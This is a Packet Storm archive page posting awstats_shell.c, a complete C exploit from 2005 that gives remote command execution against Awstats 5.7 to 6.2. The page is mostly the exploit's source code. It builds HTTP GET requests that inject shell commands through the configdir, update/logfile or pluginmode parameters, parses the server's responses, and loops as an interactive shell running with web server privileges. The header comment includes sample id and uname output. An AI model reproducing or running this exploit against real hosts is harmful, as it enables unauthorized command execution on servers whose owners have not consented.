what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

awstats_shell.c

awstats_shell.c
Posted Mar 3, 2005
Authored by omin0us | Site dtors.ath.cx

Awstats remote exploit that allows for remote command execution on the host with privileges of the httpd process. Versions 5.7 through 6.2 are affected.

tags | exploit, remote
SHA-256 | e0d6aacf97481633bcc02f886a5337792a2211c0e98331682b0c4276982738ae

awstats_shell.c

Change Mirror Download
/*
* Awstats exploit "shell"
* code by omin0us
* omin0us208 [at] gmail [dot] com
* dtors security group
* .:( http://dtors.ath.cx ):.
*
* Vulnerability reported by iDEFENSE
*
* The awstats exploit that was discovered allows
* a user to execute arbitrary commands on the
* remote server with the privileges of the httpd
*
* This exploit combines all three methods of exploitation
* and acts as a remote "shell", parsing all returned
* data to display command output and running in a loop
* for continuous access.
*
* bash-2.05b$ awstats_shell localhost
* Awstats 5.7 - 6.2 exploit Shell 0.1
* code by omin0us
* dtors security group
* .: http://dtors.ath.cx :.
* --------------------------------------
* select exploit method:
* 1. ?configdir=|cmd}
* 2. ?update=1&logfile=|cmd|
* 3. ?pluginmode=:system("cmd");
*
* method [1/2/3]? 1
* starting shell...
* (ctrl+c to exit)
* sh3ll> id
* uid=80(www) gid=80(www) groups=80(www)
* DTORS_STOP
* sh3ll> uname -a
*
* FreeBSD omin0us.dtors.ath.cx 4.8-RELEASE FreeBSD 4.8-RELEASE #3: Mon Oct 11
* 19:34:01 EDT 2004 omin0us@localhost:/usr/src/sys/compile/DTORS i386
* DTORS_STOP
* sh3ll>
*
* this is licensed under the GPL
*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netdb.h>

#define PORT 80
#define CMD_BUFFER 512
#define IN_BUFFER 10000
#define MAGIC_START "DTORS_START"
#define MAGIC_STOP "DTORS_STOP"

void usage(char *argv[]);

int main(int argc, char *argv[]){

FILE *output;
int sockfd;
struct sockaddr_in addr;
struct hostent *host;
char *host_name=NULL, *awstats_dir=NULL;
char cmd[CMD_BUFFER], cmd_url[CMD_BUFFER*3], incoming[IN_BUFFER], tmp, c, cli_opt;
int i, j, flag, method, verbose=0;


if(argc < 2){
usage(argv);
}

printf("Awstats 5.7 - 6.2 exploit Shell 0.1\n");
printf("code by omin0us\n");
printf("dtors security group\n");
printf(".: http://dtors.ath.cx :.\n");
printf("--------------------------------------\n");

while(1){
cli_opt = getopt(argc, argv, "h:d:v");

if(cli_opt < 0)
break;

switch(cli_opt){
case 'v':
verbose = 1;
break;
case 'd':
awstats_dir = optarg;
break;
}
}

if((optind >= argc) || (strcmp(argv[optind], "-") == 0)){
printf("Please specify a Host\n");
usage(argv);
}

if(!awstats_dir){
awstats_dir = "/cgi-bin/awstats.pl";
}

printf("select exploit method:\n"
"\t1. ?configdir=|cmd}\n"
"\t2. ?update=1&logfile=|cmd|\n"
"\t3. ?pluginmode=:system(\"cmd\");\n");
while(method != '1' && method != '2' && method != '3'){
printf("\nmethod [1/2/3]? ");
method = getchar();
}

printf("starting shell...\n(ctrl+c to exit)\n");


while(1){
i=0;
j=0;
memset(cmd, 0, CMD_BUFFER);
memset(cmd_url, 0, CMD_BUFFER*3);
memset(incoming, 0, IN_BUFFER);

if((sockfd = socket(AF_INET, SOCK_STREAM, 0)) < 0){
printf("Error creating socket\n");
exit(1);
}

if((host = gethostbyname(argv[optind])) == NULL){
printf("Could not resolv host\n");
exit(1);
}

addr.sin_family = AF_INET;
addr.sin_port = htons(PORT);
addr.sin_addr = *((struct in_addr *)host->h_addr);

printf("sh3ll> ");
fgets(cmd, CMD_BUFFER-1, stdin);

if(verbose)
printf("Connecting to %s (%s)...\n", host->h_name, inet_ntoa(*((struct in_addr *)host->h_addr)));

if( connect(sockfd, (struct sockaddr *)&addr, sizeof(struct sockaddr_in)) != 0){
printf("Count not connect to host\n");
exit(1);
}

output = fdopen(sockfd, "a");
setbuf(output, NULL);

cmd[strlen(cmd)-1] = '\0';
if(strlen(cmd) == 0){
cmd[0]='i';
cmd[1]='d';
cmd[3]='\0';
}

for(i=0; i<strlen(cmd); i++){
c = cmd[i];
if(c == ' '){
cmd_url[j++] = '%';
cmd_url[j++] = '2';
cmd_url[j++] = '0';
}
else{
cmd_url[j++] = c;
}
}
cmd_url[j] = '\0';

if(method == '1'){
if(verbose){
printf("Sending Request\n");
printf("GET %s?configdir=|echo;echo+%s;%s;echo+%s;echo| HTTP/1.0\n\n", awstats_dir, MAGIC_START, cmd_url, MAGIC_STOP);
}

fprintf(output, "GET %s?configdir=|echo;echo+%s;%s;echo+%s;echo| HTTP/1.0\n\n", awstats_dir, MAGIC_START, cmd_url, MAGIC_STOP);
}

if(method == '2'){
if(verbose){
printf("Sending Request\n");
printf("GET %s?update=1&logfile=|echo;echo+%s;%s;echo+%s;echo| HTTP/1.0\n\n", awstats_dir, MAGIC_START, cmd_url, MAGIC_STOP);
}
fprintf(output, "GET %s?update=1&logfile=|echo;echo+%s;%s;echo+%s;echo| HTTP/1.0\n\n", awstats_dir, MAGIC_START, cmd_url, MAGIC_STOP);
}

if(method == '3'){
if(verbose){
printf("Sending Request\n");
printf("GET %s?pluginmode=:system(\"echo+%s;%s;echo+%s\"); HTTP/1.0\n"
"Connection: Keep-Alive\n"
"Host: %s\n\n", awstats_dir, MAGIC_START, cmd_url, MAGIC_STOP, argv[optind]);
}
fprintf(output, "GET %s?pluginmode=:system(\"echo+%s;%s;echo+%s\"); HTTP/1.0\n"
"Connection: Keep-Alive\n"
"Host: %s\n\n", awstats_dir, MAGIC_START, cmd_url, MAGIC_STOP, argv[optind]);
}


i=0;
while(strstr(incoming, MAGIC_START) == NULL){
flag = read(sockfd, &tmp, 1);
incoming[i++] = tmp;

if(i >= IN_BUFFER){
printf("flag [-] incoming buffer full\n");
exit(1);
}
if(flag==0){
printf("exploitation of host failed\n");
exit(1);
}
}

while(strstr(incoming, MAGIC_STOP) == NULL){
read(sockfd,&tmp,1);
incoming[i++] = tmp;
putchar(tmp);
if(i >= IN_BUFFER){
printf("putchar [-] incoming buffer full\n");
exit(1);
}
}
printf("\n");

shutdown(sockfd, SHUT_WR);
close(sockfd);
fclose(output);
}
return(0);
}

void usage(char *argv[]){
printf("Usage: %s [options] <host>\n" , argv[0]);
printf("Options:\n");
printf(" -d <awstats_dir> directory of awstats script\n");
printf(" '/cgi-bin/awstats.pl' is default\n");
printf(" if no directory is specified\n\n");
printf(" -v verbose mode (optional)\n\n");
printf("example: %s -d /stats/awstats.pl website.com\n\n", argv[0]);
exit(1);
}
Login or Register to add favorites

File Archive:

December 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Dec 1st
    0 Files
  • 2
    Dec 2nd
    41 Files
  • 3
    Dec 3rd
    25 Files
  • 4
    Dec 4th
    0 Files
  • 5
    Dec 5th
    0 Files
  • 6
    Dec 6th
    0 Files
  • 7
    Dec 7th
    0 Files
  • 8
    Dec 8th
    0 Files
  • 9
    Dec 9th
    0 Files
  • 10
    Dec 10th
    0 Files
  • 11
    Dec 11th
    0 Files
  • 12
    Dec 12th
    0 Files
  • 13
    Dec 13th
    0 Files
  • 14
    Dec 14th
    0 Files
  • 15
    Dec 15th
    0 Files
  • 16
    Dec 16th
    0 Files
  • 17
    Dec 17th
    0 Files
  • 18
    Dec 18th
    0 Files
  • 19
    Dec 19th
    0 Files
  • 20
    Dec 20th
    0 Files
  • 21
    Dec 21st
    0 Files
  • 22
    Dec 22nd
    0 Files
  • 23
    Dec 23rd
    0 Files
  • 24
    Dec 24th
    0 Files
  • 25
    Dec 25th
    0 Files
  • 26
    Dec 26th
    0 Files
  • 27
    Dec 27th
    0 Files
  • 28
    Dec 28th
    0 Files
  • 29
    Dec 29th
    0 Files
  • 30
    Dec 30th
    0 Files
  • 31
    Dec 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close